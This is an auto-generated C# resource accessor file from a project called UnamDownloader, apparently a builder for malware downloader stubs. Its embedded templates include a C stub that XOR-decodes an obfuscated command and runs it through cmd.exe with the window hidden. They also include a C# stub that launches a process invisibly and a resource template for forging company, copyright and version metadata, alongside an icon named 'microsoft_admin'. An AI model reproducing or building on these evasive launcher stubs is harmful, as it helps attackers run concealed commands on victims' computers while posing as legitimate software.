//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace UnamDownloader.Properties {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("UnamDownloader.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        internal static byte[] Compilers {
            get {
                object obj = ResourceManager.GetObject("Compilers", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Bitmap.
        /// </summary>
        internal static System.Drawing.Bitmap microsoft_admin {
            get {
                object obj = ResourceManager.GetObject("microsoft_admin", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to #include &lt;windows.h&gt;
        ///#include &lt;ShellAPI.h&gt;
        ///
        ////* Created by Unam Sanctam, https://github.com/UnamSanctam */
        ///
        ///int main(int argc, char **argv) 
        ///{
        ///#if DefError
        ///	run_program(NULL, cipher(&quot;#ERRORCOMMAND&quot;, #ERRORCOMMANDLENGTH));
        ///#endif
        ///#if DefDelay
        ///	sleep(#DELAY * 1000);
        ///#endif
        ///	char* output = (char*)malloc(sizeof(char) * #LENGTH+1);
        ///	output[#LENGTH] = 0;
        ///	for (int i = 0; i &lt; #LENGTH; ++i) {
        ///		output[i] = &quot;#COMMAND&quot;[i] ^ &quot;#KEY&quot;[i % #KEYLENGTH];
        ///	}
        ///	ShellExecuteA(NULL, &quot;open&quot;, &quot;cmd.exe&quot;, output, NULL, SW_HIDE);
        ///	ret [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string ProgramC {
            get {
                return ResourceManager.GetString("ProgramC", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.Diagnostics;
        ///
        ///namespace Program
        ///{
        ///    static class Program
        ///    {
        ///        Process.Start(new ProcessStartInfo
        ///        {
        ///            FileName = #TARGET,
        ///            Arguments = #ARGUMENTS,
        ///            WorkingDirectory = Environment.SystemDirectory,
        ///            WindowStyle = ProcessWindowStyle.Hidden,
        ///            CreateNoWindow = true
        ///        });
        ///    }
        ///}
        ///.
        /// </summary>
        internal static string ProgramCS {
            get {
                return ResourceManager.GetString("ProgramCS", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to #ifdef DefIcon
        ///MAINICON ICON &quot;#ICON&quot;
        ///#endif
        ///1 24 &quot;loader.manifest&quot;
        ///#ifdef DefAssembly
        ///1 VERSIONINFO
        ///FILEVERSION     #VERSION
        ///PRODUCTVERSION  #VERSION
        ///BEGIN
        ///    BLOCK &quot;StringFileInfo&quot;
        ///    BEGIN
        ///        BLOCK &quot;040904b0&quot;
        ///        BEGIN
        ///            VALUE &quot;CompanyName&quot;, &quot;#COMPANY&quot;
        ///			VALUE &quot;FileTitle&quot;, &quot;#TITLE&quot;
        ///            VALUE &quot;FileDescription&quot;, &quot;#DESCRIPTION&quot;
        ///            VALUE &quot;FileVersion&quot;, &quot;#VERSION&quot;
        ///            VALUE &quot;LegalCopyright&quot;, &quot;#COPYRIGHT&quot;
        ///			VALUE &quot;LegalTrademark&quot;, &quot;#TRADEMARK&quot;
        ///  [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string resource {
            get {
                return ResourceManager.GetString("resource", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to &lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot; ?&gt; 
        ///&lt;asmv1:assembly manifestVersion=&quot;1.0&quot; xmlns=&quot;urn:schemas-microsoft-com:asm.v1&quot; xmlns:asmv1=&quot;urn:schemas-microsoft-com:asm.v1&quot; xmlns:asmv2=&quot;urn:schemas-microsoft-com:asm.v2&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot;&gt;
        ///    &lt;assemblyIdentity version=&quot;#MANIFESTVERSION&quot; name=&quot;#MANIFESTNAME&quot; /&gt;
        ///    &lt;trustInfo xmlns=&quot;urn:schemas-microsoft-com:asm.v2&quot;&gt;
        ///        &lt;security&gt;
        ///            &lt;requestedPrivileges xmlns=&quot;urn:schemas-microsoft-com:asm.v3&quot;&gt;
        ///                &lt;re [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string template {
            get {
                return ResourceManager.GetString("template", resourceCulture);
            }
        }
    }
}
